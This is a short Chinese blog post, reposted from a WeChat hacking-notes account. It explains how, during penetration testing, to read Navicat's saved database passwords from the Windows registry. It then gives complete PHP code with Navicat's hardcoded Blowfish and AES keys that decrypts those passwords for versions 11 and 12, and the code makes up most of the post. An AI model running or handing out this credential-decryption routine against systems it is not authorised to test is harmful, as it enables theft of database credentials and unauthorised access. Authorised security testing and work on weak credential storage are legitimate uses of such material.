Navicat是我们常用的一款数据库管理工具。在渗透测试中,我们可以想办法读取Navicat存放的数据库密码。从而直接登录数据库!
获取加密数据
使用【Win】+ 【R】组合快捷键,快速打开运行命令框,在打开后面键入命令:【Regedit】打开注册表编辑器 依照注册表的位置,打开注册表计算机HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers通过上方路径,找到注册表中存储密码值的位置(如下图),选中要查看密码的连接名称,双击Pwd项,复制对应的值,至此获得了密文!
密码解密
在php环境中运行代码,或者利用在线php工具都可以。并修改代码倒数第二行值为你的加密内容。
<?phpnamespaceFatSmallTools;classNavicatPassword{protected$version =0;protected$aesKey ='libcckeylibcckey';protected$aesIv ='libcciv libcciv ';protected$blowString ='3DC5CA39';protected$blowKey =null;protected$blowIv =null;publicfunction__construct($version =12){$this->version = $version;$this->blowKey = sha1('3DC5CA39',true);$this->blowIv = hex2bin('d9c7c3c8870d64bd');}publicfunctionencrypt($string){$result =FALSE;switch($this->version) {case11:$result =$this->encryptEleven($string);break;case12:$result =$this->encryptTwelve($string);break;default:break;}return$result;}protectedfunctionencryptEleven($string){$round = intval(floor(strlen($string) /8));$leftLength = strlen($string) %8;$result ='';$currentVector =$this->blowIv;for($i =0; $i < $round; $i++) {$temp =$this->encryptBlock($this->xorBytes(substr($string,8* $i,8), $currentVector));$currentVector =$this->xorBytes($currentVector, $temp);$result .= $temp;}if($leftLength) {$currentVector =$this->encryptBlock($currentVector);$result .=$this->xorBytes(substr($string,8* $i, $leftLength), $currentVector);}returnstrtoupper(bin2hex($result));}protectedfunctionencryptBlock($block){returnopenssl_encrypt($block,'BF-ECB',$this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);}protectedfunctiondecryptBlock($block){returnopenssl_decrypt($block,'BF-ECB',$this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);}protectedfunctionxorBytes($str1, $str2){$result ='';for($i =0; $i < strlen($str1); $i++) {$result .= chr(ord($str1[$i]) ^ ord($str2[$i]));}return$result;}protectedfunctionencryptTwelve($string){$result = openssl_encrypt($string,'AES-128-CBC',$this->aesKey, OPENSSL_RAW_DATA,$this->aesIv);returnstrtoupper(bin2hex($result));}publicfunctiondecrypt($string){$result =FALSE;switch($this->version) {case11:$result =$this->decryptEleven($string);break;case12:$result =$this->decryptTwelve($string);break;default:break;}return$result;}protectedfunctiondecryptEleven($upperString){$string = hex2bin(strtolower($upperString));$round = intval(floor(strlen($string) /8));$leftLength = strlen($string) %8;$result ='';$currentVector =$this->blowIv;for($i =0; $i < $round; $i++) {$encryptedBlock = substr($string,8* $i,8);$temp =$this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);$currentVector =$this->xorBytes($currentVector, $encryptedBlock);$result .= $temp;}if($leftLength) {$currentVector =$this->encryptBlock($currentVector);$result .=$this->xorBytes(substr($string,8* $i, $leftLength), $currentVector);}return$result;}protectedfunctiondecryptTwelve($upperString){$string = hex2bin(strtolower($upperString));returnopenssl_decrypt($string,'AES-128-CBC',$this->aesKey, OPENSSL_RAW_DATA,$this->aesIv);}}
use FatSmallToolsNavicatPassword;
//需要指定版本,11或12
//$navicatPassword = new NavicatPassword(12);
$navicatPassword = new NavicatPassword(11);
//解密 将加密内容改为你的。
$decode = $navicatPassword->decrypt('7EAA549760822DA9A89CBBE9');
echo $decode."n";
解密效果如下
至此,我们就得到了Navicat存放在本地的密码。
原文始发于微信公众号(kali黑客笔记):查看Navicat保存的密码
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论